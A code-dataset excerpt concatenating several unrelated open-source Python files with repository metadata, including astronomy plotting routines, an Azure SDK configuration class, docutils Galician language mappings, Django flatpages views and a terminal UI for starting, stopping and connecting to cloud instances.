ysh = yhi - ht
ylo, yhi = max(0, ylo-ysh), ht-1
self.ax.set_ylim(ylo, yhi)
self.draw()
def plot_zoom(self, val):
self.plot_zoomlevel = val
self.plot_panzoom()
def plot_scroll(self, event):
# Matplotlib only gives us the number of steps of the scroll,
# positive for up and negative for down.
direction = None
if event.step > 0:
#delta = 0.9
self.plot_zoomlevel += 1.0
elif event.step < 0:
#delta = 1.1
self.plot_zoomlevel -= 1.0
self.plot_panzoom()
# x1, x2 = self.ax.get_xlim()
# y1, y2 = self.ax.get_ylim()
# self.ax.set_xlim(x1*delta, x2*delta)
# self.ax.set_ylim(y1*delta, y2*delta)
# self.draw()
return True
def plot_button_press(self, event):
if event.button == 1:
self.plot_x, self.plot_y = event.x, event.y
return True
def plot_motion_notify(self, event):
if event.button == 1:
xdelta = event.x - self.plot_x
#ydelta = event.y - self.plot_y
ydelta = self.plot_y - event.y
self.pan_plot(xdelta, ydelta)
def pan_plot(self, xdelta, ydelta):
x1, x2 = self.ax.get_xlim()
y1, y2 = self.ax.get_ylim()
self.ax.set_xlim(x1+xdelta, x2+xdelta)
self.ax.set_ylim(y1+ydelta, y2+ydelta)
self.draw()
class RadialPlot(Plot):
def plot_radial(self, x, y, radius, image):
img_data, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
self.ax.cla()
# Make a radial plot
self.ax.set_xlim(-0.1, radius)
self.set_titles(title="Radial plot", xtitle='Radius [pixels]',
ytitle='Pixel Value (ADU)')
self.ax.grid(True)
try:
ht, wd = img_data.shape
off_x, off_y = x1, y1
maxval = numpy.nanmax(img_data)
# create arrays of radius and value
r = []
v = []
for i in range(0, wd):
for j in range(0, ht):
r.append( numpy.sqrt( (off_x + i - x)**2 + (off_y + j - y)**2 ) )
v.append(img_data[j, i])
r, v = numpy.array(r), numpy.array(v)
# compute and plot radial fitting
            # note: you may want to adjust `deg` here.
coefficients = numpy.polyfit(x=r, y=v, deg=10)
polynomial = numpy.poly1d(coefficients)
x_curve = numpy.linspace(numpy.min(r), numpy.max(r), len(r))
y_curve = polynomial(x_curve)
yerror = 0 # for now, no error bars
self.ax.errorbar(r, v, yerr=yerror, marker='x', ls='none',
color='blue')
self.ax.plot(x_curve, y_curve, '-', color='green', lw=2)
#self.fig.tight_layout()
self.draw()
except Exception as e:
self.logger.error("Error making radial plot: %s" % (
str(e)))
class FWHMPlot(Plot):
def __init__(self, *args, **kwargs):
super(FWHMPlot, self).__init__(*args, **kwargs)
self.iqcalc = iqcalc.IQCalc(self.logger)
def _plot_fwhm_axis(self, arr, iqcalc, skybg, color1, color2, color3):
N = len(arr)
X = numpy.array(list(range(N)))
Y = arr
# subtract sky background
Y = Y - skybg
maxv = Y.max()
# clamp to 0..max
Y = Y.clip(0, maxv)
self.logger.debug("Y=%s" % (str(Y)))
self.ax.plot(X, Y, color=color1, marker='.')
fwhm, mu, sdev, maxv = iqcalc.calc_fwhm(arr)
        # Make a slightly smoother Gaussian curve by plotting intermediate
# points
XN = numpy.linspace(0.0, float(N), N*10)
Z = numpy.array([iqcalc.gaussian(x, (mu, sdev, maxv))
for x in XN])
self.ax.plot(XN, Z, color=color1, linestyle=':')
self.ax.axvspan(mu-fwhm/2.0, mu+fwhm/2.0,
facecolor=color3, alpha=0.25)
return (fwhm, mu, sdev, maxv)
def plot_fwhm(self, x, y, radius, image, cutout_data=None, iqcalc=None):
x0, y0, xarr, yarr = image.cutout_cross(x, y, radius)
if iqcalc is None:
iqcalc = self.iqcalc
self.ax.cla()
#self.ax.set_aspect('equal', adjustable='box')
self.set_titles(ytitle='Brightness', xtitle='Pixels',
title='FWHM')
self.ax.grid(True)
# Make a FWHM plot
try:
# get median value from the cutout area
if cutout_data is None:
cutout_data, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
skybg = numpy.median(cutout_data)
self.logger.debug("cutting x=%d y=%d r=%d med=%f" % (
x, y, radius, skybg))
self.logger.debug("xarr=%s" % (str(xarr)))
fwhm_x, mu, sdev, maxv = self._plot_fwhm_axis(xarr, iqcalc, skybg,
'blue', 'blue', 'skyblue')
self.logger.debug("yarr=%s" % (str(yarr)))
fwhm_y, mu, sdev, maxv = self._plot_fwhm_axis(yarr, iqcalc, skybg,
'green', 'green', 'seagreen')
self.ax.legend(('data x', 'gauss x', 'data y', 'gauss y'),
loc='upper right', shadow=False, fancybox=False,
prop={'size': 8}, labelspacing=0.2)
self.set_titles(title="FWHM X: %.2f Y: %.2f" % (fwhm_x, fwhm_y))
#self.fig.tight_layout()
self.draw()
except Exception as e:
self.logger.error("Error making fwhm plot: %s" % (
str(e)))
class SurfacePlot(Plot):
def __init__(self, *args, **kwargs):
super(SurfacePlot, self).__init__(*args, **kwargs)
self.dx = 21
self.dy = 21
self.floor = None
self.ceiling = None
self.stride = 1
self.cmap = "RdYlGn_r"
def plot_surface(self, x, y, radius, image, cutout_data=None):
Z, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
X = numpy.arange(x1, x2, 1)
Y = numpy.arange(y1, y2, 1)
X, Y = numpy.meshgrid(X, Y)
try:
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.ticker import LinearLocator, FormatStrFormatter
self.ax = self.fig.gca(projection='3d', axisbg='#808080')
self.ax.set_aspect('equal', adjustable='box')
#self.ax.cla()
self.set_titles(ytitle='Y', xtitle='X',
title='Surface Plot')
self.ax.grid(True)
zmin = numpy.min(Z) if self.floor is None else self.floor
zmax = numpy.max(Z) if self.ceiling is None else self.ceiling
sfc = self.ax.plot_surface(X, Y, Z, rstride=self.stride,
cstride=self.stride,
cmap=self.cmap, linewidth=0,
antialiased=False)
# TODO: need to determine sensible defaults for these based
# on the data
self.ax.zaxis.set_major_locator(LinearLocator(10))
self.ax.zaxis.set_major_formatter(FormatStrFormatter('%.0f'))
self.ax.set_zlim(zmin, zmax)
self.ax.xaxis.set_ticks(numpy.arange(x1, x2, 10))
self.ax.xaxis.set_major_formatter(FormatStrFormatter('%.0f'))
self.ax.yaxis.set_ticks(numpy.arange(y1, y2, 10))
self.ax.yaxis.set_major_formatter(FormatStrFormatter('%.0f'))
self.ax.view_init(elev=20.0, azim=30.0)
self.fig.colorbar(sfc, orientation='horizontal', shrink=0.9,
pad=0.01)
self.draw()
except Exception as e:
self.logger.error("Error making surface plot: %s" % (
str(e)))
#END
|
stscieisenhamer/ginga
|
ginga/util/plots.py
|
Python
|
bsd-3-clause
| 17,329 | 0.002193 |
#!/usr/bin/env python
#-*- coding: utf-8 -*
import argparse
from lib.Parser import Parser
from lib.Vectorizer import Vectorizer
# argument parser setup
parser = argparse.ArgumentParser()
parser.add_argument('menu')
parser.add_argument('in_path')
parser.add_argument('out_path', nargs='?')
def get_input():
    """Parse a word-arithmetic formula typed by the user, e.g. "king-man+woman"
    yields pos == ['king', 'woman'] and neg == ['man']."""
    pos = []
    neg = []
for l in raw_input('\nplease input formula(or "END"): ').split('+'):
words = l.split('-')
pos.append(words[0])
for i in range(1, len(words)):
neg.append(words[i])
return pos, neg
if __name__ == '__main__':
args = parser.parse_args()
menu = args.menu
in_path = args.in_path
out_path = args.out_path
if menu == 'parse':
p = Parser('-Owakati')
p.parse_file(in_path, out_path)
elif menu == 'vectorize':
v = Vectorizer(min_count=10)
v.build_from_file(in_path)
v.store(out_path)
elif menu == 'calc':
v = Vectorizer()
v.load(in_path)
while True:
pos, neg = get_input()
if pos[0] == 'END':
            break
else:
v.calc(pos, neg)
|
smrmkt/sample_mecab_word2vec
|
corpus.py
|
Python
|
bsd-3-clause
| 1,144 | 0.004401 |
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2018 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
from __future__ import absolute_import, division, print_function
from marshmallow import Schema, fields, missing
class PositionSchemaV1(Schema):
current = fields.Raw()
institution = fields.Raw()
rank = fields.Raw()
display_date = fields.Method('get_display_date', default=missing)
def get_display_date(self, data):
current = data.get('current')
start_date = data.get('start_date')
end_date = data.get('end_date')
suffixed_start_date = '{}-'.format(start_date) if start_date else ''
if current:
return '{}present'.format(suffixed_start_date)
if end_date:
return '{}{}'.format(suffixed_start_date, end_date)
if start_date:
return start_date
return missing
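# Illustrative sketch (not part of the original module): serializing a position
# record with the schema; the exact return type of dump() depends on the
# installed marshmallow version (2.x returns a MarshalResult, 3.x a dict).
if __name__ == "__main__":
    example = {
        'current': True,
        'institution': 'CERN',
        'rank': 'STAFF',
        'start_date': '2015',
    }
    print(PositionSchemaV1().dump(example))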
|
inspirehep/inspire-next
|
inspirehep/modules/records/serializers/schemas/json/authors/common/position.py
|
Python
|
gpl-3.0
| 1,690 | 0 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy, AsyncARMChallengeAuthenticationPolicy
from .._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
class SubscriptionClientConfiguration(Configuration):
"""Configuration for SubscriptionClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
"""
def __init__(
self,
credential: "AsyncTokenCredential",
**kwargs: Any
) -> None:
super(SubscriptionClientConfiguration, self).__init__(**kwargs)
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
self.credential = credential
self.api_version = "2018-06-01"
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'mgmt-resource/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs: Any
) -> None:
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.AsyncRetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.AsyncRedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = AsyncARMChallengeAuthenticationPolicy(self.credential, *self.credential_scopes, **kwargs)
|
Azure/azure-sdk-for-python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/v2018_06_01/aio/_configuration.py
|
Python
|
mit
| 2,950 | 0.004407 |
# -*- coding: utf-8 -*-
# Author: David Goodger
# Contact: goodger@users.sourceforge.net
# Revision: $Revision: 4229 $
# Date: $Date: 2005-12-23 00:46:16 +0100 (Fri, 23 Dec 2005) $
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Galician-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
u'atenci\u00f3n': 'attention',
u'advertencia': 'caution',
u'code (translation required)': 'code',
u'perigo': 'danger',
u'erro': 'error',
u'pista': 'hint',
u'importante': 'important',
u'nota': 'note',
u'consello': 'tip',
u'aviso': 'warning',
u'admonici\u00f3n': 'admonition',
u'barra lateral': 'sidebar',
u't\u00f3pico': 'topic',
u'bloque-li\u00f1a': 'line-block',
u'literal-analizado': 'parsed-literal',
u'r\u00fabrica': 'rubric',
u'ep\u00edgrafe': 'epigraph',
u'realzados': 'highlights',
u'coller-citaci\u00f3n': 'pull-quote',
u'compor': 'compound',
u'recipiente': 'container',
#'questions': 'questions',
u't\u00e1boa': 'table',
u't\u00e1boa-csv': 'csv-table',
u't\u00e1boa-listaxe': 'list-table',
#'qa': 'questions',
#'faq': 'questions',
u'meta': 'meta',
'math (translation required)': 'math',
#'imagemap': 'imagemap',
u'imaxe': 'image',
u'figura': 'figure',
u'inclu\u00edr': 'include',
u'cru': 'raw',
u'substitu\u00edr': 'replace',
u'unicode': 'unicode',
u'data': 'date',
u'clase': 'class',
u'regra': 'role',
u'regra-predeterminada': 'default-role',
u't\u00edtulo': 'title',
u'contido': 'contents',
u'seccnum': 'sectnum',
u'secci\u00f3n-numerar': 'sectnum',
u'cabeceira': 'header',
u'p\u00e9 de p\u00e1xina': 'footer',
#'footnotes': 'footnotes',
#'citations': 'citations',
u'notas-destino': 'target-notes',
u'texto restruturado-proba-directiva': 'restructuredtext-test-directive'}
"""Galician name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
u'abreviatura': 'abbreviation',
u'ab': 'abbreviation',
u'acr\u00f3nimo': 'acronym',
u'ac': 'acronym',
u'code (translation required)': 'code',
u'\u00edndice': 'index',
u'i': 'index',
u'sub\u00edndice': 'subscript',
u'sub': 'subscript',
u'super\u00edndice': 'superscript',
u'sup': 'superscript',
u'referencia t\u00edtulo': 'title-reference',
u't\u00edtulo': 'title-reference',
u't': 'title-reference',
u'referencia-pep': 'pep-reference',
u'pep': 'pep-reference',
u'referencia-rfc': 'rfc-reference',
u'rfc': 'rfc-reference',
u'\u00e9nfase': 'emphasis',
u'forte': 'strong',
u'literal': 'literal',
'math (translation required)': 'math',
u'referencia-nome': 'named-reference',
u'referencia-an\u00f3nimo': 'anonymous-reference',
u'referencia-nota ao p\u00e9': 'footnote-reference',
u'referencia-citaci\u00f3n': 'citation-reference',
u'referencia-substituci\u00f3n': 'substitution-reference',
u'destino': 'target',
u'referencia-uri': 'uri-reference',
u'uri': 'uri-reference',
u'url': 'uri-reference',
u'cru': 'raw',}
"""Mapping of Galician role names to canonical role names for interpreted text.
"""
|
JulienMcJay/eclock
|
windows/Python27/Lib/site-packages/docutils/parsers/rst/languages/gl.py
|
Python
|
gpl-2.0
| 3,711 | 0.001886 |
from django.conf import settings
from django.contrib.flatpages.models import FlatPage
from django.contrib.sites.models import get_current_site
from django.http import Http404, HttpResponse, HttpResponsePermanentRedirect
from django.shortcuts import get_object_or_404
from django.template import loader, RequestContext
from django.utils.safestring import mark_safe
from django.views.decorators.csrf import csrf_protect
DEFAULT_TEMPLATE = 'flatpages/default.html'
# This view is called from FlatpageFallbackMiddleware.process_response
# when a 404 is raised, which often means CsrfViewMiddleware.process_view
# has not been called even if CsrfViewMiddleware is installed. So we need
# to use @csrf_protect, in case the template needs {% csrf_token %}.
# However, we can't just wrap this view; if no matching flatpage exists,
# or a redirect is required for authentication, the 404 needs to be returned
# without any CSRF checks. Therefore, we only
# CSRF protect the internal implementation.
def flatpage(request, url):
"""
Public interface to the flat page view.
Models: `flatpages.flatpages`
Templates: Uses the template defined by the ``template_name`` field,
or :template:`flatpages/default.html` if template_name is not defined.
Context:
flatpage
`flatpages.flatpages` object
"""
if not url.startswith('/'):
url = '/' + url
site_id = get_current_site(request).id
try:
f = get_object_or_404(FlatPage,
url__exact=url, sites__id__exact=site_id)
except Http404:
if not url.endswith('/') and settings.APPEND_SLASH:
url += '/'
f = get_object_or_404(FlatPage,
url__exact=url, sites__id__exact=site_id)
return HttpResponsePermanentRedirect('%s/' % request.path)
else:
raise
return render_flatpage(request, f)
@csrf_protect
def render_flatpage(request, f):
"""
Internal interface to the flat page view.
"""
# If registration is required for accessing this page, and the user isn't
# logged in, redirect to the login page.
if f.registration_required and not request.user.is_authenticated():
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(request.path)
if f.template_name:
t = loader.select_template((f.template_name, DEFAULT_TEMPLATE))
else:
t = loader.get_template(DEFAULT_TEMPLATE)
# To avoid having to always use the "|safe" filter in flatpage templates,
# mark the title and content as already safe (since they are raw HTML
# content in the first place).
f.title = mark_safe(f.title)
f.content = mark_safe(f.content)
c = RequestContext(request, {
'flatpage': f,
})
response = HttpResponse(t.render(c))
return response
|
Beeblio/django
|
django/contrib/flatpages/views.py
|
Python
|
bsd-3-clause
| 2,846 | 0.000703 |
'''
1.create private vpc router network with cidr
2.check dhcp ip address
@author Antony WeiJiang
'''
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.net_operations as net_ops
import test_stub_for_dhcp_ip as test_stub_dhcp
import random
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
l2_query_resource = res_ops.L2_NETWORK
type_l2 = ["L2NoVlanNetwork","L2VlanNetwork"]
l3_name = "test_dhcp_server"
ip_range_name = "dhcp_ip_range"
ip_Version = [4,6]
networkcidr = "192.168.1.0/24"
dhcp_ip_for_private_vpc = "192.168.1.3"
dhcp_system_tags = ["flatNetwork::DhcpServer::"+dhcp_ip_for_private_vpc+"::ipUuid::null"]
def test():
test_util.test_logger("start dhcp test for l3 public network")
test_util.test_dsc("get no vlan network uuid")
private_vpcnetwork = test_stub_dhcp.VpcNetwork_IP_For_Dhcp()
private_vpcnetwork.set_l2_query_resource(l2_query_resource)
private_vpcnetwork.set_l2_type(type_l2[1])
l2_no_vlan_uuid = private_vpcnetwork.get_l2uuid()
test_util.test_logger("antony @@@debug : %s" %(l2_no_vlan_uuid))
test_util.test_logger("create l3 network")
private_vpcnetwork.set_ipVersion(ip_Version[0])
private_vpcnetwork.create_l3uuid(l3_name)
test_util.test_logger("antony @@@debug : %s" %(private_vpcnetwork.get_l3uuid()))
private_vpcnetwork.add_service_to_l3_vpcnetwork()
test_util.test_logger("add ip v4 range to l3 network")
private_vpcnetwork.add_ip_by_networkcidr(ip_range_name, networkcidr, dhcp_system_tags)
if private_vpcnetwork.check_dhcp_ipaddress().find(dhcp_ip_for_private_vpc) == -1:
test_util.test_fail("dhcp server ip create fail")
test_util.test_logger("delete l3 network")
private_vpcnetwork.del_l3uuid()
test_util.test_pass("dhcp server ip create successfully")
'''
to be defined
'''
def error_cleanup():
pass
'''
to be defined
'''
def env_recover():
pass
|
zstackorg/zstack-woodpecker
|
integrationtest/vm/simulator/dhcp_server_ip/test_dhcp_for_vpcrouter_cidr.py
|
Python
|
apache-2.0
| 2,037 | 0.018164 |
"""Process User Interface and execute commands.
License:
MCC - Command-Line Instance Control for AWS, Azure, GCP and AliCloud.
Copyright (C) 2017-2018 Robert Peteuil
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
URL: https://github.com/robertpeteuil/multi-cloud-control
Author: Robert Peteuil
"""
from __future__ import absolute_import, print_function
from builtins import range
from blessed import Terminal
from mcc.confdir import CONFIG_DIR
import sys
from mcc.cldcnct import busy_disp_on, busy_disp_off
from time import sleep
from mcc.colors import C_NORM, C_TI, C_GOOD, C_ERR, C_WARN, C_STAT, C_HEAD2
from gevent import monkey
from gevent import subprocess
monkey.patch_all()
term = Terminal()
def ui_main(fmt_table, node_dict):
"""Create the base UI in command mode."""
cmd_funct = {"quit": False,
"run": node_cmd,
"stop": node_cmd,
"connect": node_cmd,
"details": node_cmd,
"update": True}
ui_print("\033[?25l") # cursor off
print("{}\n".format(fmt_table))
sys.stdout.flush()
# refresh_main values:
# None = loop main-cmd, True = refresh-list, False = exit-program
refresh_main = None
while refresh_main is None:
cmd_name = get_user_cmd(node_dict)
if callable(cmd_funct[cmd_name]):
refresh_main = cmd_funct[cmd_name](cmd_name, node_dict)
else:
refresh_main = cmd_funct[cmd_name]
if cmd_name != "connect" and refresh_main:
ui_clear(len(node_dict) + 2)
return refresh_main
def get_user_cmd(node_dict):
"""Get main command selection."""
key_lu = {"q": ["quit", True], "r": ["run", True],
"s": ["stop", True], "u": ["update", True],
"c": ["connect", True], "d": ["details", True]}
ui_cmd_bar()
cmd_valid = False
input_flush()
with term.cbreak():
while not cmd_valid:
val = input_by_key()
cmd_name, cmd_valid = key_lu.get(val.lower(), ["invalid", False])
if not cmd_valid:
ui_print(" - {0}Invalid Entry{1}".format(C_ERR, C_NORM))
sleep(0.5)
ui_cmd_bar()
return cmd_name
def node_cmd(cmd_name, node_dict):
"""Process commands that target specific nodes."""
sc = {"run": cmd_startstop, "stop": cmd_startstop,
"connect": cmd_connect, "details": cmd_details}
node_num = node_selection(cmd_name, len(node_dict))
refresh_main = None
if node_num != 0:
(node_valid, node_info) = node_validate(node_dict, node_num, cmd_name)
if node_valid:
sub_cmd = sc[cmd_name] # get sub-command
refresh_main = sub_cmd(node_dict[node_num], cmd_name, node_info)
else: # invalid target
ui_print_suffix(node_info, C_ERR)
sleep(1.5)
else: # '0' entered - exit command but not program
ui_print(" - Exit Command")
sleep(0.5)
return refresh_main
def node_selection(cmd_name, node_qty):
"""Determine Node via alternate input method."""
cmd_disp = cmd_name.upper()
cmd_title = ("\r{1}{0} NODE{2} - Enter {3}#{2}"
" ({4}0 = Exit Command{2}): ".
format(cmd_disp, C_TI, C_NORM, C_WARN, C_HEAD2))
ui_cmd_title(cmd_title)
selection_valid = False
input_flush()
with term.cbreak():
while not selection_valid:
node_num = input_by_key()
try:
node_num = int(node_num)
except ValueError:
node_num = 99999
if node_num <= node_qty:
selection_valid = True
else:
ui_print_suffix("Invalid Entry", C_ERR)
sleep(0.5)
ui_cmd_title(cmd_title)
return node_num
def node_validate(node_dict, node_num, cmd_name):
"""Validate that command can be performed on target node."""
    # cmd_name: [required-state, message-shown-when-the-state-does-not-match]
req_lu = {"run": ["stopped", "Already Running"],
"stop": ["running", "Already Stopped"],
"connect": ["running", "Can't Connect, Node Not Running"],
"details": [node_dict[node_num].state, ""]}
tm = {True: ("Node {1}{2}{0} ({5}{3}{0} on {1}{4}{0})".
format(C_NORM, C_WARN, node_num,
node_dict[node_num].name,
node_dict[node_num].cloud_disp, C_TI)),
False: req_lu[cmd_name][1]}
node_valid = bool(req_lu[cmd_name][0] == node_dict[node_num].state)
node_info = tm[node_valid]
return node_valid, node_info
def cmd_startstop(node, cmd_name, node_info):
"""Confirm command and execute it."""
cmd_lu = {"run": ["ex_start_node", "wait_until_running", "RUNNING"],
"stop": ["ex_stop_node", "", "STOPPING"]}
# specific delay & message {provider: {command: [delay, message]}}
cld_lu = {"azure": {"stop": [6, "Initiated"]},
"aws": {"stop": [6, "Initiated"]}}
conf_mess = ("\r{0}{1}{2} {3} - Confirm [y/N]: ".
format(C_STAT[cmd_name.upper()], cmd_name.upper(), C_NORM,
node_info))
cmd_result = None
if input_yn(conf_mess):
exec_mess = ("\r{0}{1}{2} {3}: ".
format(C_STAT[cmd_name.upper()], cmd_lu[cmd_name][2],
C_NORM, node_info))
ui_erase_ln()
ui_print(exec_mess)
busy_obj = busy_disp_on() # busy indicator ON
node_drv = getattr(node, "driver")
main_cmd = getattr(node_drv, cmd_lu[cmd_name][0])
response = main_cmd(node) # noqa
cmd_wait = cmd_lu[cmd_name][1]
if cmd_wait:
seccmd = getattr(node_drv, cmd_wait)
response = seccmd([node]) # noqa
delay, cmd_end = cld_lu.get(node.cloud,
{}).get(cmd_name, [0, "Successful"])
sleep(delay)
busy_disp_off(busy_obj) # busy indicator OFF
ui_print("\033[D") # remove extra space
cmd_result = True
ui_print_suffix("{0} {1}".format(cmd_name.title(), cmd_end), C_GOOD)
sleep(1.5)
else:
ui_print_suffix("Command Aborted")
sleep(0.75)
return cmd_result
def cmd_connect(node, cmd_name, node_info):
"""Connect to node."""
# FUTURE: call function to check for custom connection-info
conn_info = "Defaults"
conf_mess = ("\r{0}{1} TO{2} {3} using {5}{4}{2} - Confirm [y/N]: ".
format(C_STAT[cmd_name.upper()], cmd_name.upper(), C_NORM,
node_info, conn_info, C_HEAD2))
cmd_result = None
if input_yn(conf_mess):
exec_mess = ("\r{0}CONNECTING TO{1} {2} using {4}{3}{1}: ".
format(C_STAT[cmd_name.upper()], C_NORM, node_info,
conn_info, C_HEAD2))
ui_erase_ln()
ui_print(exec_mess)
(ssh_user, ssh_key) = ssh_get_info(node)
if ssh_user:
ssh_cmd = "ssh {0}{1}@{2}".format(ssh_key, ssh_user,
node.public_ips)
else:
ssh_cmd = "ssh {0}{1}".format(ssh_key, node.public_ips)
print("\n")
ui_print("\033[?25h") # cursor on
subprocess.call(ssh_cmd, shell=True)
ui_print("\033[?25l") # cursor off
print()
cmd_result = True
else:
ui_print_suffix("Command Aborted")
sleep(0.75)
return cmd_result
def cmd_details(node, cmd_name, node_info):
"""Display Node details."""
ui_print_suffix("Command Aborted")
return None
def ssh_get_info(node):
"""Determine ssh-user and ssh-key for node."""
ssh_key = ""
if node.cloud == "aws":
raw_key = node.extra['key_name']
ssh_key = "-i {0}{1}.pem ".format(CONFIG_DIR, raw_key)
ssh_user = ssh_calc_aws(node)
elif node.cloud == "azure":
ssh_user = node.extra['properties']['osProfile']['adminUsername']
elif node.cloud == "gcp":
items = node.extra['metadata'].get('items', [{}])
keyname = items['key' == 'ssh-keys'].get('value', "")
pos = keyname.find(":")
ssh_user = keyname[0:pos]
elif node.cloud == "alicloud":
ssh_user = ""
return ssh_user, ssh_key
def ssh_calc_aws(node):
"""Calculate default ssh-user based on image-if of AWS instance."""
userlu = {"ubunt": "ubuntu", "debia": "admin", "fedor": "root",
"cento": "centos", "openb": "root"}
image_name = node.driver.get_image(node.extra['image_id']).name
if not image_name:
image_name = node.name
    # Pair the literal key 'name' with a matching default user, if any; zipping
    # even/odd slices yields {'name': <user>} on a match and an empty dict
    # otherwise, so the lookup below falls back to 'ec2-user'.
    usertemp = ['name'] + [value for key, value in list(userlu.items())
                           if key in image_name.lower()]
    usertemp = dict(zip(usertemp[::2], usertemp[1::2]))
    username = usertemp.get('name', 'ec2-user')
return username
def ui_print(to_print):
"""Print text without carriage return."""
sys.stdout.write(to_print)
sys.stdout.flush()
def ui_print_suffix(to_print, clr=C_WARN):
"""Print Colored Suffix Message after command."""
ui_print(" - {1}{0}{2}".format(to_print, clr, C_NORM))
def ui_cmd_title(cmd_title):
"""Display Title and function statement for current command."""
ui_erase_ln()
ui_print(cmd_title)
def ui_cmd_bar():
"""Display Command Bar."""
cmd_bar = ("\rSELECT COMMAND - {2}(R){1}un {0}(C){1}onnect "
"{3}(S){1}top {0}(U){1}pdate"
" {0}(Q){1}uit: ".
format(C_TI, C_NORM, C_GOOD, C_ERR))
# FUTURE - TO BE USED WHEN DETAILS IMPLEMENTED
# cmd_bar = ("\rSELECT COMMAND - {2}(R){1}un {0}(C){1}onnect "
# "{3}(S){1}top {0}(D){1}etails {0}(U){1}pdate Info"
# " {4}(Q){1}uit: ".
# format(C_TI, C_NORM, C_GOOD, C_ERR, C_HEAD2))
ui_erase_ln()
ui_print(cmd_bar)
def ui_del_char(check_len):
"""Move Left and delete one character."""
if check_len:
ui_print("\033[D \033[D")
def ui_clear(num_lines):
"""Clear previous display info from screen in prep for new data."""
ui_erase_ln()
for i in range(num_lines, 0, -1):
ui_print("\033[A")
ui_erase_ln()
def ui_erase_ln():
"""Erase line above and position cursor on that line."""
blank_ln = " " * (term.width - 1)
ui_print("\r{0}".format(blank_ln))
def input_flush():
"""Flush the input buffer on posix and windows."""
try:
import sys, termios # noqa
termios.tcflush(sys.stdin, termios.TCIFLUSH)
except ImportError:
import msvcrt
while msvcrt.kbhit():
msvcrt.getch()
def input_by_key():
"""Get user input using term.inkey to prevent /n printing at end."""
usr_inp = ''
input_valid = True
input_flush()
with term.cbreak():
while input_valid:
ui_print("\033[?25h") # cursor on
key_raw = term.inkey()
if key_raw.name == "KEY_ENTER":
input_valid = False
ui_print("\033[?25l") # cursor off
break
if key_raw.name == 'KEY_DELETE':
ui_del_char(len(usr_inp))
usr_inp = usr_inp[:-1]
if not key_raw.is_sequence:
usr_inp += key_raw
ui_print(key_raw)
if not usr_inp:
ui_print("\033[D")
return usr_inp
def input_yn(conf_mess):
"""Print Confirmation Message and Get Y/N response from user."""
ui_erase_ln()
ui_print(conf_mess)
with term.cbreak():
input_flush()
val = input_by_key()
return bool(val.lower() == 'y')
|
robertpeteuil/multi-cloud-control
|
mcc/uimode.py
|
Python
|
gpl-3.0
| 12,295 | 0.000081 |
# -*- coding: utf-8 -*-
from datetime import datetime
import json
from pytz import UTC
from django.core.urlresolvers import reverse
from django.test import TestCase
from edxmako import add_lookup
import mock
from django_comment_client.tests.factories import RoleFactory
from django_comment_client.tests.unicode import UnicodeTestMixin
from django_comment_client.tests.utils import ContentGroupTestCase
import django_comment_client.utils as utils
